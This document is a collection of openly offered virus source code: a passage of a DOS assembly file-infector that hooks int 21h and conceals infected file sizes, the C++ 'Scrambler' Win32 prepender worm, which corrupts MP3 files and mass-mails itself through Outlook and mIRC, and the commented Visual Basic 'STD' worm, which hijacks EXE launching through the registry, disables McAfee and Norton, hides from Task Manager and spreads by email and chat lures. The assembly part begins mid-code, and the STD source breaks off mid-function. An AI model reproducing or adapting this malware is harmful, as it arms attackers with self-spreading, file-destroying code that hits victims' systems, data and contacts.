mov byte ptr ds:[fcb_jmp_ - p], offset loc_121a - (fcb_jmp_ + 1) ; yope so turn off fcb_sub_viruz_size loc_1107: mov cx, 7 ; check 4 7 antivirusez mov si, offset _scan_ - p ; start with SCAN locloop_110D: push cx call sub_1149 pop cx jz short loc_113C loop locloop_110D

; compare name ; it'z antiviruz ? ; nope go on

mov si, offset name_buffer - p ; gimme name_buffer xor bl, bl ; 2 get drive lodsw cmp ah, 3Ah ; ':' jne short loc_1125 sub al, 40h ; ok make valid_drive_number mov bl, al ; and store it 2 bl loc_1125: mov ax, 4408h ; get drive_statuz call int_21h or ax, ax ; medium can be exchanged ? which_jump_? db 74h db offset loc_1146 - ($ + 1) mov ax, 4409h ; get far disk statuz call int_21h jc short loc_113C ; error ? test dh, 10h ; iz far disk in net ? jnz short loc_1146 loc_113C: stc ; set error_flag loc_113D: pop ax pop es pop ds pop di pop si ; restore regz pop cx pop bx pop dx retn ; and end ... loc_1146: clc ; clear error_flag jmp short loc_113D ; and end ... sub_1098 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz comparez 2 stringz sub_1149 proc near push di lodsb ; gimme bytez_count mov cl, al ; store it 2 cx mov ax, si ; gimme si add ax, cx ; add bytez_count 2 offset repe cmpsb ; compare mov si, ax ; store new_offset pop di retn ; and end ...

sub_1149

endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz checkz whether there'z a viruz in the file or not ... ; and if not returnz in ax the value which iz 4 infected sub_1157 proc near push dx mov ax, es:[bx+2] ; gimme date xor dx, dx div word ptr cs:[date_div-p]; div it mov ax, es:[bx] ; gimme time and al, 1Fh ; and it cmp al, dl ; the same ? stc ; set Cflag (infected) jz short loc_1176 mov ax, es:[bx] ; gimme time and ax, 0FFE0h ; and it or al, dl ; or it with date clc ; clear Cflag (not infected) loc_1176: pop dx retn ; and end ... sub_1157 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Sub viruz_size sub_1178 proc near sub word ptr es:[bx], offset buffer - p; sub viruz_file sbb word ptr es:[bx+2], 0 jnc short loc_ret_118E ; underflow ? add word ptr es:[bx], offset buffer - p; yope adc word ptr es:[bx+2], 0 ; so add it back loc_ret_118E: retn sub_1178 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ; Diz iz main infection routine ... sub_118F proc near push ax push bx push cx push si ; push regz push di push bp push ds push es call sub_1034 ; set my int_24h mov ax, 4300h ; gimme file_attribz call int_21h mov cs:[file_attribz - p], cx; store it mov ax, 4301h ; set new attribz xor cx, cx ; no attribz

call int_21h jc short loc_11D3 ; error ? mov ax, 3D02h ; open file 4 read_&_write call int_21h jc short loc_11CA ; error ? push dx push ds push cs pop ds push cs pop es mov ds:[handle - p], ax ; store handle call sub_0E7C ; ok infect the file mov ah, 3Eh call sub_0E6F ; close file pop ds pop dx loc_11CA: mov ax, 4301h ; set back old_attribz db 0b9h ; mov cx, ? file_attribz dw 20h call int_21h loc_11D3: call sub_1052 ; set back old_int_24h pop es pop ds pop bp pop di pop si ; restore regz pop cx pop bx pop ax retn ; and end ... sub_118F endp new_int_21h: pushf sti cmp ah, 11h ; je short loc_11EB cmp ah, 12h ; jne short loc_121A loc_11EB: db 0ebh fcb_jmp_ db 0 push bx push es push ax mov ah, 2Fh ; call int_21h pop ax call int_21h cmp al, 0FFh ; je short loc_1216 push ax ; cmp byte ptr es:[bx], jne short loc_1207 add bx, 7 ; loc_1207: add bx, 17h ; call sub_1157 pop ax jnc short loc_1216

find_first_FCB_file ? find next_FCB_file ?

gimme DTA_addr

; do FCB_function did we find something ? yope 0FFh

; extended FCB ?

yope so jump over ext_FCB go2 time ; check whether infected ; already infected ?

add bx, 6 ; go2 file_size call sub_1178 ; sub viruz_size loc_1216: ; nope pop es pop bx popf iret loc_121A: cmp ah, 4Eh ; find_first_file ? je short loc_1224 cmp ah, 4Fh ; find_next_file ? jne short loc_1250 loc_1224: push bx push es push ax mov ah, 2Fh ; gimme DTA_addr call int_21h pop ax call int_21h ; do find_function jc short loc_1249 ; error ? push ax add bx, 16h ; go2 time call sub_1157 ; check whether infected pop ax jnc short loc_1242 ; already infected ? add bx, 4 ; go2 file_size call sub_1178 ; sub viruz_size loc_1242: ; nope pop es pop bx ; restore regz popf clc ; clear error_flag retf 2 ; and end ... loc_1249: ; yope pop es pop bx ; restore regz popf stc ; set error_flag retf 2 ; and end ... loc_1250: cmp ax, 4B53h ; it'z mark ? jne short loc_125A mov ax, 454Bh ; yope so get 454bh popf iret ; and end ... loc_125A: cmp ah, 4Ch ; prog'z_end ? jne short loc_1265 mov byte ptr cs:[fcb_jmp_ - p], 0 loc_1265: cld push dx cmp ax, 4B00h ; run_prog ? jne short loc_12A9 db 0ebh run_jmp db offset loc_12a7 - ($ + 1) push ax push bx push ds ; push regz push es mov ah, 52h ; gimme list_of_listz call int_21h

mov ax, es:[bx-2] ; gimme first_mcb loc_127B: mov ds, ax add ax, ds:[3] ; go2 next mcb_block inc ax cmp byte ptr ds:[0], 5Ah ; last_one ? jne loc_127B mov bx, cs ; yope cmp ax, bx ; it'z our mcb_block ? jne short loc_129D mov byte ptr ds:[0], 4Dh ; make middle_block xor ax, ax mov ds, ax add word ptr ds:[413h], 4 ; add 4K 2 mem which we took loc_129D: mov byte ptr cs:[run_jmp-p], offset loc_12a7 - (run_jmp + 1) pop es ; now jump 2 loc_12a7 pop ds pop bx ; restore regz pop ax loc_12A7: jmp short loc_12FD loc_12A9: cmp ah, 3Dh ; open_file ? je short loc_12FD cmp ah, 56h ; rename_file ? je short loc_12FD cmp ax, 6C00h ; ext_open_found ? jne short loc_12C1 test dl, 00010010b ; action 02h or/and 10h ? mov dx, si jz short loc_12FD jmp short loc_1307 ; yope loc_12C1: cmp ah, 3Ch ; found_file ? je short loc_1307 cmp ah, 5Bh ; make_new_file ? je short loc_1307 cmp ah, 3Eh ; close_file ? jne short loc_12F6 cmp bx, word ptr cs:[ext_handle - p]; do we have jne short loc_12F6 ; something 2 infect ? or bx, bx ; handle is null ? jz short loc_12F6 call int_21h ; close it jc short loc_1323 push ds push cs pop ds mov dx, offset ext_file_name - p; gimme file_name call sub_118F ; and infect it mov word ptr ds:[ext_handle - p], 0; nulluj ext_handle pop ds loc_12F0: pop dx popf clc ; clear error_flag retf 2 ; and end ... loc_12F6: pop dx popf ; jmp 2 old_int_21h jmp dword ptr cs:[old_int_21h - p__] loc_12FD:

call sub_1098 ; check 4 file_name & disk jc loc_12F6 ; error ? call sub_118F ; infect it jmp short loc_12F6 loc_1307: cmp word ptr cs:[ext_handle - p], 0 jne loc_12F6 ; ext_file already founded ? call sub_1098 ; check 4 file_name & disk jc loc_12F6 ; error ? mov word ptr cs:[file_offset - p], dx; store file_name_ pop dx ; _offset push dx call int_21h ; found it db 0bah ; mov dx, ? file_offset dw 45cch jnc short loc_1329 ; error ? loc_1323: ; yope pop dx popf stc ; set error_flag retf 2 ; and end ... loc_1329: push cx push si push di ; ok push es ; move file_name xchg si, dx ; 2 our buffer mov di, offset ext_handle - p push cs pop es stosw ; and store handle of course mov cx, 4Bh ; move 4bh bytez rep movsb ; and finally move pop es pop di pop si ; restore regz pop cx jmp short loc_12F0 ; and end ... ; db ; run_counter buffer three_bytez

'Did you leave the room ?' dw db db

04FBh 160h dup(?) ? ; offset 14bah ; instr_buffer - 3 ; 0e9h disp16 haz 3 bytez ... ? ; offset 14bbh db 10 dup(?) ; offset 14bdh 1ah dup(?) ; offset 14c7h ? ; offset 14e1h dd ? ; offset 14e5h ? ; offset 14e9h db 4bh dup(?) ; offset 14ebh 4bh dup(?) ; offset 1536h

handle dw instr_buffer file_buffer db old_int_24h dd file_time_date ext_handle dw ext_file_name name_buffer db ; seg_a ends end start

/* Virus Name: Scrambler Version: B Type: Win32 EXE Prepender / I-Worm Author: Gigabyte Homepage: http://gigabyte.coderz.net */ #include #include #include #include

<windows.h>

using namespace std; char char char char FILE

hostfile[MAX_PATH], CopyHost[MAX_PATH], Virus[MAX_PATH]; Buffer[MAX_PATH], mp3[MAX_PATH], mp3copy[MAX_PATH], checksum[2]; gbmark[2], CopyName[10], ScramFile[MAX_PATH], FullPath[MAX_PATH]; WinScript[MAX_PATH], DirToInfect[MAX_PATH], RepairHost[MAX_PATH]; *scrambler;

void VirCheck(char SRCFileName[]) { FILE *SRC; char Buffer[1]; short Counter = 0; int v = 0; SRC = fopen(SRCFileName, "rb"); if(SRC) { for (v = 0; v < 19; v ++) { Counter = fread(Buffer, 1, 1, SRC); } strcpy(checksum, Buffer); for (v = 0; v < 1; v ++) { Counter = fread(Buffer, 1, 1, SRC); } strcat(checksum, Buffer); } fclose(SRC); } void WriteVirus(char SRCFileName[], char DSTFileName[]) { FILE *SRC, *DST; char Buffer[1024]; short Counter = 0; int v = 0; SRC = fopen(SRCFileName, "rb"); if(SRC) { DST = fopen(DSTFileName, "wb"); if(DST) { for (v = 0; v < 4928; v ++) { Counter = fread(Buffer, 1, 8, SRC);

if(Counter) fwrite(Buffer, 1, Counter, DST); } } } fclose(SRC); fclose(DST); } void AddOrig(char SRCFileName[], char DSTFileName[]) { FILE *SRC, *DST; char Buffer[1024]; short Counter = 0; SRC = fopen(SRCFileName, "rb"); if(SRC) { DST = fopen(DSTFileName, "ab"); if(DST) { while(! feof(SRC)) { Counter = fread(Buffer, 1, 1024, SRC); if(Counter) fwrite(Buffer, 1, Counter, DST); } } } fclose(SRC); fclose(DST); } void CopyOrig(char SRCFileName[], char DSTFileName[]) { FILE *SRC, *DST; char Buffer[1024]; short Counter = 0; int v = 0; SRC = fopen(SRCFileName, "rb"); if(SRC) { DST = fopen(DSTFileName, "wb"); if(DST) { for (v = 0; v < 4928; v ++) { Counter = fread(Buffer, 1, 8, SRC); if(Counter) fwrite(Buffer, 0, 0, DST); } while(! feof(SRC)) { Counter = fread(Buffer, 1, 1024, SRC); if(Counter) fwrite(Buffer, 1, Counter, DST); } } } fclose(SRC); fclose(DST); }

bool FileExists(char *FileName) { HANDLE Exists; Exists = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if(Exists == INVALID_HANDLE_VALUE) return false; CloseHandle(Exists); return true; } void Scramble(char SRCFileName[], char DSTFileName[]) { FILE *SRC, *DST; char Buffer[60000]; Buffer == 0; short Counter = 0; int v = 0; SRC = fopen(SRCFileName, "rb"); if(SRC) { DST = fopen(DSTFileName, "wb"); if(DST) { for (v = 0; v < 40; v ++) { if(!fseek(SRC, 204800, SEEK_CUR)) { Counter = fread(Buffer, 1, 60000, SRC); if(Counter) { if(!fseek(DST, 104448, SEEK_CUR)) { fwrite(Buffer, 1, 60000, DST); } } } } } } fclose(SRC); fclose(DST); } void ScrambleMP3(char FolderSearch[]) { WIN32_FIND_DATA FindData; HANDLE FoundFile; char FolderSearch2[MAX_PATH]; strcpy(FolderSearch2, FolderSearch); strcat(FolderSearch2,"\\*.mp3"); FoundFile = FindFirstFile(FolderSearch2, &FindData); if(FoundFile != INVALID_HANDLE_VALUE) { do { if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { } else { GetWindowsDirectory(Buffer,MAX_PATH); _chdir(Buffer);

_chdir("system"); strcpy(mp3, FolderSearch); strcat(mp3, "\\"); strcat(mp3, FindData.cFileName ); strcpy(mp3copy, "mp3.tmp"); CopyFile(mp3, mp3copy, FALSE); Scramble(mp3copy,mp3); _unlink(mp3copy); } } while (FindNextFile(FoundFile, &FindData)); FindClose(FoundFile); } } void HDDSearch(char Path[]) { WIN32_FIND_DATA FindData; HANDLE FoundFile; char Path2[MAX_PATH], Folder[MAX_PATH]; strcpy(Path2, Path); strcat(Path2, "\\*.*"); FoundFile = FindFirstFile(Path2, &FindData); if(FoundFile != INVALID_HANDLE_VALUE) { do { if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { strcpy(Folder, Path); strcat(Folder, "\\"); strcat(Folder, FindData.cFileName); if(FindData.cFileName[0] !='.') { HDDSearch(Folder); ScrambleMP3(Folder); } } } while (FindNextFile(FoundFile, &FindData)); FindClose(FoundFile); } } void ScriptFile() { GetWindowsDirectory(Buffer,MAX_PATH); fprintf(scrambler,"[script]\nn0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }\nn1=/dcc send $nick"); fprintf(scrambler," %s%csystem%c%s\nn2=}\n", Buffer, 92, 92, CopyName); } void main(int argc, char **argv) { cout << "Scrambler" << endl; cout << "by Gigabyte" << endl; srand( (unsigned)time( NULL ) ); for(int t = 0; t < 5; t++) CopyName[t] =char(97 + (rand() % 10)); CopyName[5] = '.';

CopyName[6] = CopyName[8] = 'e'; CopyName[7] = 'x'; CopyName[9] = NULL; strcpy(Virus, argv[0]); GetWindowsDirectory(Buffer,MAX_PATH);

strcpy(FullPath, Buffer); strcat(FullPath, "\\system\\"); strcat(FullPath, CopyName); WriteVirus(Virus, FullPath); WIN32_FIND_DATA FindData; HANDLE FoundFile; strcat(DirToInfect, Buffer); strcat(DirToInfect, "\\*.exe"); FoundFile = FindFirstFile(DirToInfect, &FindData); if(FoundFile != INVALID_HANDLE_VALUE) { do { if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { } else { GetWindowsDirectory(Buffer,MAX_PATH); _chdir(Buffer); _chdir("system"); strcpy(hostfile, Buffer); strcat(hostfile, "\\"); strcat(hostfile, FindData.cFileName); VirCheck(hostfile); strcpy(gbmark,"gb"); if(FindData.cFileName[3] != 'D') { if(FindData.cFileName[0] != 'P') { if(FindData.cFileName[0] != 'R') { if(FindData.cFileName[0] != 'E') { if(FindData.cFileName[0] != 'T') { if(FindData.cFileName[0] != 'W') { if(FindData.cFileName[0] != 'w') { if(FindData.cFileName[5] != 'R') { if(checksum[1] != gbmark[1]) { strcpy(CopyHost, "host.tmp"); CopyFile(hostfile, CopyHost, FALSE);

strcpy(Virus, argv[0]); CopyFile(FullPath, hostfile, FALSE); AddOrig(CopyHost, hostfile); _unlink("host.tmp"); }}}}}}}}} } } while (FindNextFile(FoundFile, &FindData)); FindClose(FoundFile); } if(FileExists("c:\\mirc\\mirc32.exe")) { FoundFile = FindFirstFile("c:\\mirc\\download\\*.exe", &FindData); if(FoundFile != INVALID_HANDLE_VALUE) { do { if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { } else { _chdir(Buffer); _chdir("system"); strcpy(hostfile, "c:\\mirc\\download\\"); strcat(hostfile, FindData.cFileName ); VirCheck(hostfile); strcpy(gbmark,"gb"); if(checksum[1] != gbmark[1]) { strcpy(CopyHost, "host.tmp"); CopyFile(hostfile, CopyHost, FALSE); WriteVirus(Virus, hostfile); AddOrig(CopyHost, hostfile); _unlink("host.tmp"); } } } while (FindNextFile(FoundFile, &FindData)); FindClose(FoundFile); } } scrambler = fopen("c:\\mirc\\script.ini","wt"); if(scrambler) { ScriptFile(); fclose(scrambler); } scrambler = fopen("c:\\PROGRA~1\\mirc\\script.ini","wt"); if(scrambler) { ScriptFile(); fclose(scrambler); }

scrambler = fopen("d:\\mirc\\script.ini","wt"); if(scrambler) { ScriptFile(); fclose(scrambler); } scrambler = fopen("d:\\PROGRA~1\\mirc\\script.ini","wt"); if(scrambler) { ScriptFile(); fclose(scrambler); } scrambler = fopen("e:\\mirc\\script.ini","wt"); if(scrambler) { ScriptFile(); fclose(scrambler); } scrambler = fopen("e:\\PROGRA~1\\mirc\\script.ini","wt"); if(scrambler) { ScriptFile(); fclose(scrambler); } scrambler = fopen("f:\\mirc\\script.ini","wt"); if(scrambler) { ScriptFile(); fclose(scrambler); } scrambler = fopen("f:\\PROGRA~1\\mirc\\script.ini","wt"); if(scrambler) { ScriptFile(); fclose(scrambler); } strcpy(RepairHost, Buffer); strcat(RepairHost, "\\system\\hostfile.exe"); CopyOrig(Virus, RepairHost); strcpy(ScramFile, Buffer); strcat(ScramFile, "\\system\\scram.sys"); if(FileExists(ScramFile) == false) HDDSearch("c:"); strcpy(WinScript, Buffer); strcat(WinScript, "\\wscript.exe"); if(FileExists(WinScript)) { if(FileExists("scram.sys") == false) { scrambler = fopen("scrambler.vbs","wt"); if(scrambler) { fprintf(scrambler,"On Error Resume Next\n"); fprintf(scrambler,"Dim scrambler, Mail, Counter, A, B, C, D, E, F\n");

fprintf(scrambler,"Set scrambler = CreateObject(%coutlook.application%c)\n", 34, 34); fprintf(scrambler,"Set Mail = scrambler.GetNameSpace(%cMAPI%c)\n", 34, 34); fprintf(scrambler,"For A = 1 To Mail.AddressLists.Count\n"); fprintf(scrambler,"Set B = Mail.AddressLists(A)\n"); fprintf(scrambler,"Counter = 1\n"); fprintf(scrambler,"Set C = scrambler.CreateItem(0)\n"); fprintf(scrambler,"For D = 1 To B.AddressEntries.Count\n"); fprintf(scrambler,"E = B.AddressEntries(Counter)\n"); fprintf(scrambler,"C.Recipients.Add E\n"); fprintf(scrambler,"Counter = Counter + 1\n"); fprintf(scrambler,"If Counter > 90 Then Exit For\n"); fprintf(scrambler,"Next\n"); fprintf(scrambler,"C.Subject = %cCheck this out, it's funny!%c\n", 34, 34); fprintf(scrambler,"C.Attachments.Add %c%s%csystem%c%s%c\n", 34, Buffer, 92, 92, CopyName, 34); fprintf(scrambler,"C.DeleteAfterSubmit = True\n"); fprintf(scrambler,"C.Send\n"); fprintf(scrambler,"E = %c%c\n", 34, 34); fprintf(scrambler,"Next\n"); fprintf(scrambler,"Set F = CreateObject(%cScripting.FileSystemObject%c)\n", 34, 34); fprintf(scrambler,"F.DeleteFile Wscript.ScriptFullName\n"); fclose(scrambler); } ShellExecute(NULL, "open", "scrambler.vbs", NULL, NULL, SW_SHOWNORMAL); } } _chdir(Buffer); scrambler = fopen("winstart.bat", "wt"); if(scrambler) { fprintf(scrambler,"@cls\n"); fprintf(scrambler,"@echo Today..\n"); fprintf(scrambler,"@echo I'm going to scramble your mind..\n"); } fclose(scrambler); scrambler = fopen(ScramFile, "wt"); if(scrambler) { fprintf(scrambler, "Scrambler\n"); fprintf(scrambler, "by Gigabyte\n"); fclose(scrambler); } _chdir("system"); if(FileExists(RepairHost)) WinExec(RepairHost, SW_SHOWNORMAL); _unlink("hostfile.exe"); }

Attribute VB_Name = "STD" 'STD v1.0 by Error of Team Necrosis ' Commented by Error, pardon my commenting style ' ********W32.HLLP.STD.worm Source********* ' STD is a Memory-Resident EXE prepender with ' Worm functions for Outlook and mIRC Public myDNA, myRNA, MyCode, STD, Grime, MySTD As String Public FDateTime, oldDate, FDate, OldTime, FTime As String Const MySize = 17920 Const RSP_SIMPLE_SERVICE = 1 Const RSP_UNREGISTER_SERVICE = 0 Private iResult, hProg, idprog, iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Const Notification = "Hey, sorry I haven't written to you in a while. " & _ "Well you could call it a while. I'm writing this E-mail " & _ "to let you know of an attachment im sending with the next mail." Const Notify = "Here is the e-mail attachment I told you about earlier, " & _ "It's an installation program for " Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Sub Form_Load() ' I put STD into a form because if you compile ' it into a module you wont be able to chose ' what default icon STD will have, and it ends ' up with a nasty baby blue and white form. ' Which is very noticable since STD's icon ' becomes the infected EXE's icon. i then made ' the MS-DOS Program Icon as the default icon ' NOTE: Make sure you make the form set to ' visbile = false and showintaskbar = false On Error Resume Next Dim process As Long process = GetCurrentProcessId() ' This gets STD's process handle so it can ' manipulate itself Call RegisterServiceProcess(process, RSP_SIMPLE_SERVICE) ' Now STD is hidden from ALT+CTRL+DEL and ' Task Manager. This will take up kernel ' processing up to 99.9% but it will allocate ' any needed kernel processing for other ' programs and still remain hidden. Call AIDS ' AIDS = Registry Modifications to disable ' McAfee/Norton, have STD startup on windows ' load, make STD go memory-resident, and to ' modify mIRC scripting myDNA = App.EXEName If Right(App.Path, 1) <> "\" Then myRNA = App.Path & "\" End If ' The above will get the present filename of ' STD's host which has been executed myRNA = myRNA & myDNA & ".exe" ' ************MEMORY-RESIDENT AREA***********

If UCase(myRNA) = "C:\WINDOWS\SYSTEM\SYSTRAY_.EXE" Then ' STD places its code into the file: ' C:\WINDOWS\SYSTEM\SYSTRAY_.EXE ' This is called the Exe-Hooker (yes i said ' hooker). Whenever a exe is executed this file ' will be executed first, sending the running ' exe's full pah name and parameters to this ' files commandline STD = Command() ' Get the running exe's path name and parameters For X = 1 To Len(STD) strck = UCase(Mid(STD, X, 1)) Grime = Grime + strck If Right(Grime, 5) = ".EXE " Then ' Extract the exe name from the parameters Grime = Left(Grime, Len(Grime) - 1) MySTD = Right$(STD, Len(STD) - X) ' Grime = full path of the running exe ' MySTD = all the exe's parameters GoTo Trine End If Next X Trine: ff = FreeFile ' use freefiles so you dont get file i/o errors FDateTime = FileDateTime(Grime) ' Get the files Date/Time Stamp For w = 1 To Len(FDateTime) Scan = Mid(FDateTime, w, 1) If Scan = " " Then FDate = FDate + Scan ' Extract the Time FTime = Mid(FDateTime, w + 1, Len(FDateTime) - w) GoTo GotStamp End If ' Extract the Date FDate = FDate + Scan Next w GotStamp: oldDate = Date$ ' Get and store the original system date OldTime = Time$ ' Get and store the original system time Date = FDate ' Change the system Date to the files date Time = FTime ' Change the system Time to the files time ' This will keep the file's date/time stamp ' preserved (Is this a first for a VB virus?) Open Grime For Binary Access Read As ff ' Open the running exe Dim Original As String Original = Space(LOF(ff)) ' set a buffer to include the entire exe file's ' contents (I've seen exe's 126 meg being stored ' as a string in VB) Get #ff, 1, Original ' Start at the beginning of the file and get the ' entire contents of the file If UCase(Right(Original, 3)) = "STD" Then ' After getting the contents, check to see if ' the last 3 characters in a file are "STD" ' if so, that means the file is already infected

' and the original file needs to be ran ASAP Call Original_Jump ' Original_Jump = run the original exe End If Close #ff ' if the file isnt infected: Open myRNA For Binary Access Read As #2 ' open the Exe hooker file Dim Herpes As String Herpes = Space(MySize) Get #2, 1, Herpes ' Get the virus from the file Close #2 Open Grime For Binary Access Write As ff Put #ff, 1, Herpes ' Place the virus at the beginning of the Exe Put #ff, MySize, Original ' Right after STD, place the original Exe code Put #ff, LOF(ff) + 3, "STD" ' Mark the file infected with "STD" as the last ' 3 characters in a file Close #ff Call Original_Jump ' Run the original exe End If ' ********END OF MEMORY-RESIDENT CODE********* InFx_SYS ' InFx_SYS starts the infection of the system ' and makes STD go resident End Sub Public Sub InFx_SYS() On Error Resume Next Kill "C:\windows\system\systray_.exe" ' Kill any non-working installations ff = FreeFile Open myRNA For Binary Access Read As #ff ' Open the running file Dim MyCode As String MyCode = Space(MySize) Get #ff, 1, MyCode ' Extract STD from the file Close Open "C:\windows\system\systray_.exe" For Binary Access Write As #ff Put #ff, 1, MyCode ' Place STD in the Exe Hooker file Put #ff, LOF(ff) + 3, "STD" ' Mark the file infected so it wont infect ' itself Close FileCopy "C:\windows\system\systray_.exe", "C:\windows\system\runtray_.dll" ' copy the Exe Hooker file to another file for ' mailing purposes Call Original_Jump ' Run the original exe End Sub Public Sub AIDS() ' This modifies windows registry, disables AV ' products and mIRC sending stuff ' NOTE: this is ran every exe execution as well On Error Resume Next w = Chr(34) ' for saving space (And lots of it) Open "C:\ModReg.reg" For Output As #1

Print #1, "REGEDIT4" Print #1, Print #1, "[HKEY_CLASSES_ROOT\exefile\shell\open\command]" Print #1, "@=" & w & "\" & w & "C:\\windows\\system\\systray_.exe\" & w & " %1 %*" & w ' Most important command of STD is above ' This forces Windows to run all exe's through ' STD's Exe Hooker file along with their ' parameters. Once windows is restarted after ' system infection, STD will go into hardend ' residency. Windows will depend on the Exe ' Hooker to run all exe's and therefore STD ' cannot be deleted in a windows session. And ' if they delete it in DOS, no exes will run ' until the rewrite the registry Print #1, Print #1, "[HKEY_LOCAL_MACHINE\Software\McAfee\Scan95]" Print #1, w & "SerialNum" & w & "=" & w & "STD v1.0 by Error of TN" & w Print #1, w & "CurrentVersionNumber" & w & "=" & w & "666" & w Print #1, w & "DAT" & w & "=" & w & "NONE" & w Print #1, w & "DATFile" & w & "=" & w & "-2000" & w Print #1, w & "VirusInfoURL" & w & "=" & w & "http://www.norton.com" & w Print #1, w & "bVShieldEnabled" & w & "=dword:00000000" ' Disable McAfee's scanner, DAT files, and ' VShield Print #1, Print #1, "[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]" Print #1, w & "SystemTray" & w & "=" & w & "C:\\Windows\\system\\systray_.exe" & w ' Start STD on every windows startup Close #1 If Dir("C:\mirc", vbDirectory) <> "" Then Open "C:\mirc\script.ini" For Output As #1 ' Modify script.ini for STD sending Print #1, "[script]" Print #1, "n0= on 1:TEXT:*sex*:#:{" ' Everytime someone types in sex, sexy, etc ' in a Channel... Print #1, "n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky adult slideshow and was wondering if you would like a copy. So I'm going to send you one." ' STD will message them with this... Print #1, "n2= .copy C:\windows\system\runtray_.dll C:\windows\system\install_show.exe" ' rename the mailing file to this false name Print #1, "n3= .dcc send $nick C:\windows\system\install_show.exe" ' and DCC send it to the person who typed in sex ' BTW 'sex' is the 2nd most common subject/word ' typed in chats (right after a/s/l) Print #1, "n4= }" ' end the mIRC sending stuff Close End If modify = Shell("regedit /s C:\ModReg.reg", vbHide) ' run the Registry modifications in a background ' process Kill "C:\ModReg.reg" ' delete any of its traces Kill "C:\Program Files\Norton AntiVirus\*.dat" ' delete Norton's DAT files End Sub Public Function IGotWyrms(Subject1 As String, Body1 As String, Optional Attachment1 As String) On Error Resume Next ' MAPI Mailing technique got from my other virus ' W97M/Revolution ' http://teamnecrosis.20m.com/VC.html for stuff

Dim S_and_M, B_and_D, Spawnme Set S_and_M = CreateObject("Outlook.Application") Set B_and_D = S_and_M.GetNameSpace("MAPI") If S_and_M = "Outlook" Then B_and_D.Logon "Guest", "password" For y = 1 To B_and_D.AddressLists.Count ' get # of addybooks in Outlook Set AddyBook = B_and_D.AddressLists(y) X = 1 Set Spawnme = S_and_M.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count peep = AddyBook.AddressEntries(X) Spawnme.Recipients.Add peep X = X + 1 If X > 100 Then oo = AddyBook.AddressEntries.Count ' in each Addybook send STD to the first 100 ppl Next oo Spawnme.Subject = Subject1 ' Subject1 = "Hey" (on authorization mail) or ' "Here it is" (on Attachment mail) Spawnme.Body = Body1 ' the body varies.... see Original_Jump If Attachment1 <> "" Then Spawnme.Attachments.Add Attachment1 ' as above End If Spawnme.Send peep = "" Next y B_and_D.Logoff End If End Function Public Sub Original_Jump() On Error Resume Next If Grime = "" Or Grime = Empty Then Grime = myRNA ' make sure STD gets the file to run If Original = "" Or Original = Empty Then Open Grime For Binary Access Read As #3 Original = LOF(3) - MySize If Original = 0 Then End ' if the file = pure source of STD then end Dim GetOrig As String GetOrig = Space(Original) Get #3, MySize, GetOrig ' get the original code of the running exe Close #3 End If hideit = Left(Grime, Len(Grime) - 4) hideit = hideit & ".vxv" Open hideit For Binary Access Write As #10 Put #10, , GetOrig ' place the code in a temporary file with the ' same exe name but ".vxv" extension Close #10 Close Dim idprog As Long Date = oldDate Time = OldTime ' Restore system date/time if needed idprog = Shell(hideit & " " & MySTD, vbNormalFocus) ' run the original exe AND its parameters via ' running the original code from a temporary ' file

